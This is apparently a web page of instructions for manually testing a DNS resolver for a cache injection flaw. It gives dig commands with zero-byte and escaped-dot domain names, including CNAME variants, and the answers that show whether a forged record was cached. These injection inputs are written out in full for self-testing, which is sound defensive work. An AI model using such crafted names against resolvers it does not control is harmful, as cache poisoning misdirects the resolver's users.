Manually testing for the vulnerability

This page contains instructions on how to test manually for the vulnerability. We provide instructions for triggering the required queries via the tool dig. If you do not have a copy of dig on your system, it can be downloaded at https://www.isc.org/download/ as part of the BIND9 download package.

If you are using Windows, do not use the included nslookup tool, as this tool is not able to trigger all required queries.

In each command, you have to replace @your-resolver-ip with the ip address of your resolver, such as @192.168.0.1.

Test explanation

Each test is split into 2 queries.

The first query is the injection query which aims to inject a test record into the target resolver's cache.

  • If you see a different result as the expected one displayed as a result to an injection query, this means your resolver behaves unexpectedly, but does not neccessarily mean it is vulnerable to the attack.

The seconds query is the verification query, which aims to identfy if the record could be injected.

In out case, we use 2 IP addresses, one representing a vulnerable and one representing a non-vulnerable result.

  • If you see the address 141.12.174.89 in response to a verification query, this means your resolver is not vulnerable to this attack.
  • If you see the address 141.12.174.88 in response to a verification query, this means your resolver is vulnerable to this attack.

Zero byte injection (direct, variant 1)

Injection query

$ dig '1.victim.test2.xdi-attack.net.\000.test2.xdi-attack.net.' @your-resolver-ip

Expected result:

;; ANSWER SECTION:
1.victim.test2.xdi-attack.net.\000.test2.xdi-attack.net. 300 IN A 141.12.174.88

Verification query

$ dig '1.victim.test2.xdi-attack.net' @your-resolver-ip

Result if not vulnerable:

;; ANSWER SECTION:
1.victim.test2.xdi-attack.net. 300 IN A         141.12.174.89 <- non-vulnerable

Result if vulnerable:

;; ANSWER SECTION:
1.victim.test2.xdi-attack.net. 300 IN A         141.12.174.88 <- vulnerable

Zero byte injection (direct, variant 2)

Injection query

$ dig '3.victim.test2.xdi-attack.net\000.test2.xdi-attack.net.' @your-resolver-ip

Expected result:

;; ANSWER SECTION:
3.victim.test2.xdi-attack.net\000.test2.xdi-attack.net. 300 IN A 141.12.174.88

Verification query

$ dig '3.victim.test2.xdi-attack.net' @your-resolver-ip

Result if not vulnerable:

;; ANSWER SECTION:
3.victim.test2.xdi-attack.net. 300 IN A         141.12.174.89 <- non-vulnerable

Result if vulnerable:

;; ANSWER SECTION:
3.victim.test2.xdi-attack.net. 300 IN A         141.12.174.88 <- vulnerable

Zero byte injection (cname)

Injection query

$ dig '2.cnamezero.test2.xdi-attack.net' @your-resolver-ip

Expected result:

;; ANSWER SECTION:
2.cnamezero.test2.xdi-attack.net. 300 IN CNAME  2.victim.test2.xdi-attack.net.\000.test2.xdi-attack.net.
2.victim.test2.xdi-attack.net.\000.test2.xdi-attack.net. 300 IN A 141.12.174.88

Verification query

$ dig '2.victim.test2.xdi-attack.net'

Result if not vulnerable:

;; ANSWER SECTION:
2.victim.test2.xdi-attack.net. 300 IN   A       141.12.174.89 <- non-vulnerable

Result if vulnerable:

;; ANSWER SECTION:
2.victim.test2.xdi-attack.net. 300 IN   A       141.12.174.88 <- vulnerable

Dot injection (direct)

Injection query

$ dig '1.victim\.dot.test2.xdi-attack.net' @your-resolver-ip

Expected result:

;; ANSWER SECTION:
1.victim\.dot.test2.xdi-attack.net. 300 IN A    141.12.174.88

Verification query

$ dig '1.victim.dot.test2.xdi-attack.net' @your-resolver-ip

Result if not vulnerable:

;; ANSWER SECTION:
1.victim.dot.test2.xdi-attack.net. 300 IN A     141.12.174.89 <- non-vulnerable

Result if vulnerable:

;; ANSWER SECTION:
1.victim.dot.test2.xdi-attack.net. 300 IN A     141.12.174.88 <- vulnerable

Dot injection (cname)

Injection query

$ dig '2.cnamedot.test2.xdi-attack.net' @your-resolver-ip

Expected result:

;; ANSWER SECTION:
2.cnamedot.test2.xdi-attack.net. 300 IN CNAME   2.victim\.dot.test2.xdi-attack.net.
2.victim\.dot.test2.xdi-attack.net. 300 IN A    141.12.174.88

Verification query

$ dig '2.victim.dot.test2.xdi-attack.net' @your-resolver-ip

Result if not vulnerable:

;; ANSWER SECTION:
2.victim.dot.test2.xdi-attack.net. 300 IN A     141.12.174.89 <- non-vulnerable

Result if vulnerable:

;; ANSWER SECTION:
2.victim.dot.test2.xdi-attack.net. 300 IN A     141.12.174.88 <- vulnerable